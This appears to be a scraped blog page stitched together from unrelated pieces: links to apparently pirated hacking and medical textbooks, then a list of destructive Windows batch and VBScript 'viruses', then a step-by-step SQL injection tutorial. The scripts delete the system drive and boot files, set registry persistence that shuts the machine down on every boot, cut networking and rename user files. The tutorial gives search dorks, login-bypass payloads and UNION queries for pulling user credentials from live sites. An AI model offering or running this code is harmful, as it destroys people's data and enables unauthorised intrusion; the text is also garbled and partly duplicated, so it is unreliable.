https://hackingbooksfree.blogspot.in/p/sql-injection-website-hacking-according.html
Filename: Effective Python Penetration Testing.pdf
Size: 9.1 MB
Download link : https://www.file-upload.com/s55s0l12zk9m
Filename: Mastering Kali Linux for Advanced Penetration Testing.pdf
Size: 9.0 MB
Download link : https://www.file-upload.com/kmwqaw4umltz
Filename: Kali Linux Wireless Penetration Testing Essentials.pdf
Size: 21.3 MB
Download link : https://www.file-upload.com/croge7v4i7hw
Filename: Kali Linux Web Penetration Testing Cookbook.pdf
Size: 11.8 MB
Download link : https://www.file-upload.com/pt771812dedd
[8/16, 7:27 PM] Sonu: 📚🌹 *digital library*📚🌹
*👉 Chetan Bhagath*
*👉Sydney Sheldon*
*👉 Health & Medical Books*
*👉 Human & Body Books*
*👉Management Books*
*👉J.K.Rowling Books*
*👉History Books*
*👉 GST Books*
*👉 Text Books*
*👉 Many More Materials etc...*
*❗Link❗*
https://drive.google.com/folderview?id=0ByJLjeXGK6PUbnA3Q0hqcmd0dlE
📚🌹 *digital library*📚🌹
📚Complete package including links to download all the pdf books you will need in MBBS👨🏻⚕ :-
Anatomy:
1--> KLM for Gross Anatomy
2--> Snell's Anatomy
3--> BD Churassia
4--> RJ Last
5--> Grey's Anatomy
6--> Langman Embryology
7--> KLM for Embryology
8--> BD For General Anatomy
9--> Dissector
10--> Di Fore Histology
11--> Junqueira's Histology
12--> Netter Atlas of human Aantomy
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LYV9KQ3lxY29FY28
Physiology:-
1--> Guyton
2--> Ganong
3--> Sheerwood
4--> Sembulingam
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LdXlCSjdZM214dEE
Biochemistry:-
1--> Harper
2--> Lippincott
3--> Chatterjea
4--> Satyanarayan
5--> Stryer
6--> MRS Biochemistry
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0Ld0o3WnhCR2VEczg
Pathology:-
1--> Big Robins
2--> Medium Robins
3--> Pathoma
4--> Goljan
5--> Harsh Mohan Pathology
6--> Atlas of Histopathology
7--> Levinson
8--> MRS microbiology
9--> Microbiology by Jacquelyn G. Black
10--> Color Atlas of Microbiology
11--> Kaplan Pathology
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LYkRYdjFrTm5MR0U
Pharmacology:-
1--> Big Katzung
2--> Mini Katzung
3--> Kaplan Review
4--> Lippincott
5--> Pocket Katzung
6--> Rang and Dale's Pharmacology
7--> Atlas of Pharmacology
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LMkE1UUVRZGwtTlU
Forensic Medicine:-
1--> Simpson's Forensics
2--> Krishan's Forensics
3--> Atlas of Autopsy
4--> Atlas of Forensic Medicine
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LQXVwOGoyWnFSV2s
Ophthalmology:-
1--> Jogi
2--> Jatoi
3--> Parson's Textbook of Eye
4--> Kanski
5--> AK Khurana
6--> Atlas of ophthalmology
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LOHc5WVZMdkJjX2M
Otorhinolaryngology:-
1--> Dhingra
2--> Logans Turner
3--> Color Atlas of Otorhinolaryngology
4--> Maqbool's Text Book of ENT
5--> Clinical Methods in ENT by PT Wakode
6--> ENT at a Glance
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LaDY2a0lFNDlfTGc
Community Medicine:-
1--> Monica's Text Book Community Medicine
2--> Mahajan And Gupta Text Book of Community Medicine
3--> Bancroft's Text Book of Community Medicine
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0Lc1RCMml2NjhFNjA
Medicine:-
1--> Churchill's Pocketbook of DD
2--> MTB Step 2 Ck
3--> Davidson Essentials
4--> Davidson Principals and practice
5--> Harrison's Internal Medicine
6--> Internal Medicine USMLE Nuggets
7--> Internal Medicine on call bt LANGE
8--> Oxfords Specialties
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LeEFJNG5TMlc4eWc
Surgery:-
1--> Bailey_love short practice of Surgery
2--> Churchill's pocketbook of Surgery
3--> Deja Review of surgery
4--> Farquharson's Textbook of Operative General Surgery
5--> Hamilton Bailey’s Physical Signs
6--> Oxford Handbook of Clinical Surgery
7--> Schwartz's Principles of Surgery
8--> Macleod's Clinical Examination
9--> Macleod's Clinical Diagnosis
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LRFpFSG5hZ1pVWkE
Obstetrics & Gynecology:-
1--> Case Discussions in Obstetrics and Gynecology
2--> Deja Review of Obstetrics Gynecology
3--> Obstetrics by Ten Teachers
4--> Gynaecology illustrated
5--> Gynaecology by Ten Teachers
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LMU1LRjFDa1FrbjA
Pediatrics:-
1--> Nelson Essentials of Pediatrics[
2--> Nelson Complete
3--> Pediatrics Review
Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LUkdTQkVuNV92Yzg
1st Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0Lay1HT1d5Yks5V0U
2nd Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0LemtmYXpYMGlydVk
3rd Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0LWmlCSHBpUFpPZU0
4th Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0LbnJvUzk3NHRhWWc
One Link For All eBooks--> https://drive.google.com/open?id=0B3WdpdsqpX0LQW5tbWEtUmJJY0k
➖➖➖➖➖➖➖➖
📚🌹 *digital library *📚🌹
** PDF Books **
In need of any book(.pdf) relating to any subject/field or topic? go to your browser and type: www.pdfdrive.net and u will get access to millions of books u need for free.
Unlimited downloads. You may browse by title or author, etc Share with loved ones.
cript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
Method 12 :
This Virus Deletes All The Content Of A Drive...
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As Anything.bat
Method 13 :
This Will Crash Ur Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Save It As Anything.vbs
Method 14 :
The Most Simple Virus To Crush The Window
It Only Works With Windows XP
@Echo off
Del C: *.* |y
Save It As Anything.bat
Method 15 :
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
Method 16:
Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
Method 17 :
Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Save As A bat File
Method 18 :
Change Files To Non-working TXT Files
Save As A bat File
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
Method 19 :
System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE
Save As A bat File
Method 20 :
Temporarily Flood Network
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
? Open Notepad
? Type :
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
? File >> Save As...
? Name it : virus.bat
? Start >> All Programs
? Right Click on Startup >> Open
? This open the Startup folder
? Paste the Virus.bat file here !
*** That's all , now the computer will
automatically shutdown on every startup !
) "I LOVE YOU" virus
Simply copy-paste the given code in notepad:
@ echo off
:love
msg * I LOVE YOU darling....!!!
goto love
Save the file as love.bat
Once you execute the file by double clicking on it, a message box displaying “I LOVE YOU darling….!!!” Will be displayed on the screen. Try closing it. You’ll enjoy it.

Woking: Those who know ‘C’ programming will understand this quickly.
The ECHO OFF/ON Command is a command which will either turn ON, or OFF the command you put in a batch file from showing itself. Like, here we’ve typed @ echo off so it won’t show the virus code we’ve typed in.
‘:love‘ is a function you’ve created. And ‘msg * I LOVE YOU darling....!!!’ is the body of the function.‘msg’ is a command to display the message.‘goto :love’ again calls back or executes love function up to infinite times. So, it would never end.
NOTE:- This Virus will not harm to your computer but it continuously runs on the desktop and will be a “pain in the ass”. Once you restart the PC and everything will be as usual. So have fun with your friends by this love virus and also wish your Girl/Boy Friend with this new type of Wishing .
2
) "I LOVE YOU" virus
Simply copy-paste the given code in notepad:
@ echo off
:love
msg * I LOVE YOU darling....!!!
goto love
Save the file as love.bat
Once you execute the file by double clicking on it, a message box displaying “I LOVE YOU darling….!!!” Will be displayed on the screen. Try closing it. You’ll enjoy it.

Woking: Those who know ‘C’ programming will understand this quickly.
The ECHO OFF/ON Command is a command which will either turn ON, or OFF the command you put in a batch file from showing itself. Like, here we’ve typed @ echo off so it won’t show the virus code we’ve typed in.
‘:love‘ is a function you’ve created. And ‘msg * I LOVE YOU darling....!!!’ is the body of the function.‘msg’ is a command to display the message.‘goto :love’ again calls back or executes love function up to infinite times. So, it would never end.
NOTE:- This Virus will not harm to your computer but it continuously runs on the desktop and will be a “pain in the ass”. Once you restart the PC and everything will be as usual. So have fun with your friends by this love virus and also wish your Girl/Boy Friend with this new type of Wishing .
2
What is SQL Injection?
SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.
Requirements :-
• SQL Injection Dorks.
• Vulnerable Website.
• Firefox with Hack bar add-on.
• Little bit understanding of SQL
• Fresh Mind to Understand it.
Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.Use any one of the following…
► “inurl:admin.asp”
► “inurl:login/admin.asp”
► “inurl:admin/login.asp”
► “inurl:adminhome.asp”
► “inurl: admin.php”
► “inurl: login/admin.php”
► “inurl: admin/login.php”
► “inurl: login/administrator.php”
Now you can use the following code and inject into user id and password field. For user id used admin as user id.
And in password field use one one of the following code and some times these codes are also used for both user id as well as password.
• test’or1–
• ‘or 1=1#
• 1’or’1’=’1
• ‘)or1=1—
• ‘or ” = ‘
• ‘or’1’=’1
• ‘ or ‘1’=’1
• ‘ or 0=0 —
• ” or 0=0 —
• or 0=0 —
• ‘ or 0=0 #
• ‘or’ ‘=’
• ‘or’1=1’
• “) or (“a”=”a
• ‘) or (‘a’=’a
• ” or “a”=”a
• ‘ or a=a–
• or 1=1–
• ” or 1=1–
If found no luck with this method then try given below.
How to Check for Vulnerability.
To Check the Vulnerability put sigle Quote ( ) at the end of the website URL and Hit Enter.If the page remains same or Not found then its not vulnerable and if the page shows Error like this :-
An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near /contentPage.php?id=8 at line 1
This means the website is vulnerable to SQL Injection.
Step 2. Find the number of Columns.
Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now its time to find no. of Columns present in the Database.
To do that replace that one single quote ( ) with Order By no. Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like Unknown Column
Example:
www.targetwebsite.com/index.php?id=8 Order by 1
If you get an Error on Order by 9 that means the DB have 8 number of Columns
Step 3. Find the Vulnerable Column.
Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query Union Select columns_sequence.
And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign -before ID.
For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11-- ✔ And Once if the Query has been Executed then it will display the number of Column. Yeahh.... !!
In the Above result, I found three vulnerable Columns 2,3
Step 4. Finding version, Database and User.
Now this time to find out website Database version and User Just replace Vulnerable Column no. with version()
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--
And now Hit Enter : and you will get result.Now again do the same replace Vulnerable column with different query like :- database(), user()
Step 5. Finding the Table name.
Let us find now Table name of the Database, Same here Replace Vulnerable Column number with group_concat(table_name) and add the from information_schema.tables where table_schema=database() For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Now hit Enter and you can see Complete Table of Database.Great we found Table name now find the table name that is related to admin or user
Step 6. Finding the Column name.
Now same to find Column names, replace group_concat(table_name) with group_concat(column_name) and Replace the from information_schema.tables where table_schema=database()-- with FROM information_schema.columns WHERE table_name=mysqlchar--
Note :- Do not hit Enter now.... First of all Convert table name into Mysql Char String()
Install the Hackbar add-on in Firefox Click here to Download
After Installing you can see the toolbar, and if you cant then Hit F9.Select sql->Mysql->MysqlChar() in the Hackbar.
Enter the Table name you want to convert it into Mysql Char
Copy and paste the code at the end of the url instead of the mysqlchar
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--
And Now Hit Enter and you will be able to see the Column names :-
Great Here we found Username and Password Column